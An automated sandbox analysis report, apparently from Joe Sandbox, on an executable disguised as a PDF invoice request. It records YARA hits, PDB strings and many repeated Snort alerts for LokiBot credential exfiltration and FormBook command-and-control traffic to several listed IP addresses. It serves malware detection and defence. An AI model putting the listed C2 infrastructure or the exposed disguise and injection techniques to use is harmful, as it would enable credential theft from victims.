Windows Analysis Report
Ajanlatkeres_2024.05.29.PDF.exe

AI detected suspicious sample

Source: Yara match	File source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Ajanlatkeres_2024.05.29.PDF.exe

Joe Sandbox ML: detected

Source: Ajanlatkeres_2024.05.29.PDF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Ajanlatkeres_2024.05.29.PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: chkdsk.pdbGCTL source: RegSvcs.exe, 00000013.00000002.1394975056.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.1394558501.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3742534236.0000000000BA0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: Eusz.pdb source: Ajanlatkeres_2024.05.29.PDF.exe
Source:	Binary string: jORR.pdbSHA2563 source: YLc7afPlL4RjCeK.exe.6.dr
Source:	Binary string: chkdsk.pdb source: RegSvcs.exe, 00000013.00000002.1394975056.0000000000C18000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.1394558501.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3742534236.0000000000BA0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000013.00000002.1393977019.0000000000472000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1394168499.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1396638681.00000000052A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000013.00000002.1395457023.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000015.00000002.3751618566.0000000005450000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1394168499.00000000050FE000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.3751618566.00000000055EE000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.1396638681.00000000052A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: jORR.pdb source: YLc7afPlL4RjCeK.exe.6.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000013.00000002.1393977019.0000000000472000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: Eusz.pdbSHA256 source: Ajanlatkeres_2024.05.29.PDF.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 15_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

15_2_00403D74

Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 4x nop then jmp 077B97F2h	14_2_077B9271
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 4x nop then jmp 077B97F2h	14_2_077B9541
Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	Code function: 4x nop then jmp 077B97F2h	14_2_077B9201
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop esi	19_2_0041732B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop esi	21_2_00A4732B

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.9:49712 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49712 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49712 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.9:49712 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.9:49714 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49714 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49714 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.9:49714 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49715 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49715 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49715 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49715 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49716 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49716 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49716 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49716 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49717 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49717 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49717 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49717 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49720 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49720 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49720 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49720 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49721 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49721 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49721 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49721 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49722 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49722 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49722 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49722 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49723 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49723 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49723 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49723 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49724 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49724 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49724 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49724 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49725 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49725 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49725 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49725 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49726 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49726 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49726 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49726 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49727 -> 216.40.34.41:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49728 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49728 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49728 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49728 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49729 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49729 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49729 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49729 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49730 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49730 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49730 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49730 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49731 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49731 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49731 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49731 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49732 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49732 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49732 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49732 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49734 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49734 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49734 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49734 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49735 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49735 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49735 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49735 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49736 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49736 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49736 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49736 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49737 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49737 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49737 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49737 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49738 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49738 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49738 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49738 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49739 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49739 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49739 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49739 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49740 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49740 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49740 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49740 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49741 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49741 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49741 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49741 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49742 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49742 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49742 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49742 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49743 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49743 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49743 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49743 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49744 -> 103.224.212.213:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49745 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49745 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49745 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49745 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49746 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49746 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49746 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49746 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49747 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49747 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49747 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49747 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49748 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49748 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49748 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49748 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49749 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49749 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49749 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49749 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49750 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49750 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49750 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49750 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49751 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49751 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49751 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49751 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49752 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49752 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49752 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49752 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49753 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49753 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49753 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49753 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49754 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49754 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49754 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49754 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49755 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49755 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49755 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49755 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49756 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49756 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49756 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49756 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49757 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49757 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49757 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49757 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49758 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49758 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49758 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49758 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49759 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49759 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49759 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49759 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49760 -> 104.21.10.127:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49761 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49761 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49761 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49761 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49762 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49762 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49762 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.9:49762 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.9:49763 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.9:49763 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.9:49763 -> 45.61.137.215:80
